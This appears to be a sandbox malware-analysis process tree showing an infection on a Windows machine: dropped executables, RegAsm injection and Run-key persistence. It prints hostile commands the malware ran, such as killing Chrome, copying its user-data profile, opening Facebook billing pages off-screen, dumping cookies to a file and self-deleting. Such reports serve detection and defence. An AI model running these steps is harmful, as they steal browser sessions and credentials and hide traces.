"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1528 /prefetch:2
15⤵
PID:7156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1
15⤵
PID:9816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1
15⤵
PID:7436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
15⤵
PID:5300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
15⤵
PID:7520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1
15⤵
PID:7524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
15⤵
PID:7736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --mojo-platform-channel-handle=5360 /prefetch:8
15⤵
PID:9264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --mojo-platform-channel-handle=5296 /prefetch:8
15⤵
PID:1688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --mojo-platform-channel-handle=5064 /prefetch:8
15⤵
PID:9380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --mojo-platform-channel-handle=2160 /prefetch:8
15⤵
PID:7680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --mojo-platform-channel-handle=852 /prefetch:8
15⤵
PID:11148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1508,2296844412489350721,857595891094170210,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5540 /prefetch:2
15⤵
PID:10668

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:7180

C:\Users\Admin\Documents\1AKMrCbJ3J6D.exe
"C:\Users\Admin\Documents\1AKMrCbJ3J6D.exe"
13⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:7232

C:\Users\Admin\Documents\VeA5586ccCU3.exe
"C:\Users\Admin\Documents\VeA5586ccCU3.exe"
13⤵
- Suspicious use of SetThreadContext
PID:10096

C:\Users\Admin\Documents\VeA5586ccCU3.exe
"C:\Users\Admin\Documents\VeA5586ccCU3.exe"
14⤵
PID:10860

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:9808

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:8748

C:\Users\Admin\Documents\VMbPdR4BX9Ct.exe
"C:\Users\Admin\Documents\VMbPdR4BX9Ct.exe"
13⤵
- Suspicious use of SetThreadContext
PID:308

C:\Users\Admin\Documents\VMbPdR4BX9Ct.exe
"C:\Users\Admin\Documents\VMbPdR4BX9Ct.exe"
14⤵
PID:10984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:10260

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:10288

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:10312

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
- Suspicious use of SetWindowsHookEx
PID:10332

C:\Users\Admin\Documents\sl9UJySjtNxC.exe
"C:\Users\Admin\Documents\sl9UJySjtNxC.exe"
13⤵
- Suspicious use of SetWindowsHookEx
PID:10352

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
14⤵
PID:10816

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
15⤵
- Kills process with taskkill
PID:11200

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99\" /s /e /y
14⤵
- Enumerates system info in registry
PID:8516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
14⤵
PID:11000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7fff6df16e00,0x7fff6df16e10,0x7fff6df16e20
15⤵
PID:10744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,16938032005442805339,7919668668885001766,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\dvhgjkidh99" --mojo-platform-channel-handle=1620 /prefetch:8
15⤵
PID:9864

C:\Users\Admin\Documents\4zW2LjAIxWfV.exe
"C:\Users\Admin\Documents\4zW2LjAIxWfV.exe"
13⤵
PID:10368

C:\Users\Admin\AppData\Local\Temp\X36W7PUU85\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\X36W7PUU85\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
14⤵
- Drops file in Windows directory
PID:11092

C:\Users\Admin\AppData\Local\Temp\X36W7PUU85\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\X36W7PUU85\multitimer.exe" 1 3.1615558288.604b7690a166f 105
15⤵
- Adds Run key to start application
PID:8064

C:\Users\Admin\AppData\Local\Temp\X36W7PUU85\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\X36W7PUU85\multitimer.exe" 2 3.1615558288.604b7690a166f
16⤵
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
PID:10752

C:\Users\Admin\Documents\5MjGOXkwkYjH.exe
"C:\Users\Admin\Documents\5MjGOXkwkYjH.exe"
13⤵
PID:10392

C:\Users\Admin\AppData\Local\Temp\MYWTM4MND3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\MYWTM4MND3\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
14⤵
- Drops file in Windows directory
PID:11212

C:\Users\Admin\AppData\Local\Temp\MYWTM4MND3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\MYWTM4MND3\multitimer.exe" 1 3.1615558288.604b76908257d 105
15⤵
- Adds Run key to start application
PID:7996

C:\Users\Admin\AppData\Local\Temp\MYWTM4MND3\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\MYWTM4MND3\multitimer.exe" 2 3.1615558288.604b76908257d
16⤵
- Maps connected drives based on registry
- Enumerates system info in registry
PID:1208

C:\Users\Admin\Documents\iGO0cC4S3kj3.exe
"C:\Users\Admin\Documents\iGO0cC4S3kj3.exe"
13⤵
- Suspicious use of SetWindowsHookEx
PID:10300

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:10280

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:10248

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:7448

C:\Users\Admin\Documents\7VTSgiw6xogs.exe
"C:\Users\Admin\Documents\7VTSgiw6xogs.exe"
13⤵
- Checks processor information in registry
PID:7924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 7VTSgiw6xogs.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\7VTSgiw6xogs.exe" & del C:\ProgramData\*.dll & exit
14⤵
PID:7912

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 7VTSgiw6xogs.exe /f
15⤵
- Kills process with taskkill
PID:7812

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
15⤵
- Delays execution with timeout.exe
PID:10956

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:6684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
PID:8196

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:9916

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
14⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:10804

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
13⤵
- Suspicious use of SetWindowsHookEx
PID:10828

C:\Users\Admin\Documents\Tk4lreAIt 9k.exe
"C:\Users\Admin\Documents\Tk4lreAIt 9k.exe"
13⤵
- Checks whether UAC is enabled
PID:10788

C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:188

C:\Users\Admin\AppData\Roaming\EA85.tmp.exe
"C:\Users\Admin\AppData\Roaming\EA85.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3956

C:\Users\Admin\AppData\Roaming\EA85.tmp.exe
"C:\Users\Admin\AppData\Roaming\EA85.tmp.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
5⤵
PID:4204

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:4764

C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
4⤵
- Executes dropped EXE
PID:4280

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:4956

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4372

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3808

C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
4⤵
- Adds Run key to start application
PID:5512

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:2228

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:5528

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:7424

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:10360

C:\Users\Admin\AppData\Local\Temp\is-CD11U.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CD11U.tmp\Setup3310.tmp" /SL5="$301C2,802346,56832,C:\Users\Admin\AppData\Local\Temp\xkw155lrmu4\Setup3310.exe" /Verysilent /subid=577
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4172

C:\Users\Admin\AppData\Local\Temp\is-OI2T5.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-OI2T5.tmp\Setup.exe" /Verysilent
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4488

C:\Users\Admin\AppData\Local\Temp\is-5DP25.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5DP25.tmp\Setup.tmp" /SL5="$3029C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-OI2T5.tmp\Setup.exe" /Verysilent
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3812

C:\Users\Admin\AppData\Local\Temp\is-S7TNU.tmp\FkIw5o3KqG0E.exe
"C:\Users\Admin\AppData\Local\Temp\is-S7TNU.tmp\FkIw5o3KqG0E.exe" /Verysilent
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6000

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:4316

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetWindowsHookEx
PID:416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 628
6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5240

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:5160

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:4920

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4884

C:\Users\Admin\AppData\Local\Temp\U9OJLLB1CE\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\U9OJLLB1CE\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
6⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:6824

C:\Users\Admin\AppData\Local\Temp\U9OJLLB1CE\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\U9OJLLB1CE\multitimer.exe" 1 3.1615557405.604b731d0b0fe 105
7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6884

C:\Users\Admin\AppData\Local\Temp\U9OJLLB1CE\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\U9OJLLB1CE\multitimer.exe" 2 3.1615557405.604b731d0b0fe
8⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Enumerates system info in registry
PID:6792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4196

C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
6⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:6148

C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe" 1 3.1615557406.604b731e1d212 105
7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6988

C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe" 2 3.1615557406.604b731e1d212
8⤵
- Maps connected drives based on registry
- Enumerates system info in registry
PID:6576

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:5276

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:4380

C:\Users\Admin\Documents\t3inZRCqsjdW.exe
"C:\Users\Admin\Documents\t3inZRCqsjdW.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Users\Admin\AppData\Local\Temp\MXXZ64B9M4\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\MXXZ64B9M4\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
6⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:7004

C:\Users\Admin\AppData\Local\Temp\MXXZ64B9M4\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\MXXZ64B9M4\multitimer.exe" 1 3.1615557405.604b731dedf91 105
7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6968

C:\Users\Admin\AppData\Local\Temp\MXXZ64B9M4\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\MXXZ64B9M4\multitimer.exe" 2 3.1615557405.604b731dedf91
8⤵
- Maps connected drives based on registry
- Enumerates system info in registry
PID:6708

C:\Users\Admin\Documents\eSlZAnMoMNVf.exe
"C:\Users\Admin\Documents\eSlZAnMoMNVf.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5452

C:\Users\Admin\AppData\Local\Temp\1Y69CJCV7S\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\1Y69CJCV7S\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
6⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:5904

C:\Users\Admin\AppData\Local\Temp\1Y69CJCV7S\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\1Y69CJCV7S\multitimer.exe" 1 3.1615557406.604b731e1fb8d 105
7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6976

C:\Users\Admin\AppData\Local\Temp\1Y69CJCV7S\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\1Y69CJCV7S\multitimer.exe" 2 3.1615557406.604b731e1fb8d
8⤵
- Maps connected drives based on registry
- Enumerates system info in registry
PID:6060

C:\Users\Admin\Documents\8nz38 7KX19q.exe
"C:\Users\Admin\Documents\8nz38 7KX19q.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5444

C:\Users\Admin\Documents\8nz38 7KX19q.exe
"C:\Users\Admin\Documents\8nz38 7KX19q.exe"
6⤵
- Executes dropped EXE
PID:6664

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetWindowsHookEx
PID:5364

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:6492

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:5356

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5344

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:6572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:5316

C:\Users\Admin\Documents\FlP6LqyXbTDa.exe
"C:\Users\Admin\Documents\FlP6LqyXbTDa.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5632

C:\Users\Admin\AppData\Local\Temp\is-5V3M0.tmp\FlP6LqyXbTDa.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5V3M0.tmp\FlP6LqyXbTDa.tmp" /SL5="$5044E,3376292,58368,C:\Users\Admin\Documents\FlP6LqyXbTDa.exe"
6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:4248

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:5916

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:5132

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetWindowsHookEx
PID:6116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 628
6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:6064

C:\Users\Admin\Documents\XaiSp82353Xk.exe
"C:\Users\Admin\Documents\XaiSp82353Xk.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:6016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im XaiSp82353Xk.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\XaiSp82353Xk.exe" & del C:\ProgramData\*.dll & exit
6⤵
PID:5428

C:\Windows\SysWOW64\taskkill.exe
taskkill /im XaiSp82353Xk.exe /f
7⤵
- Kills process with taskkill
PID:6860

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:516

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:5784

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:5600

C:\Users\Admin\Documents\YsU5j51khm0T.exe
"C:\Users\Admin\Documents\YsU5j51khm0T.exe"
5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:5548

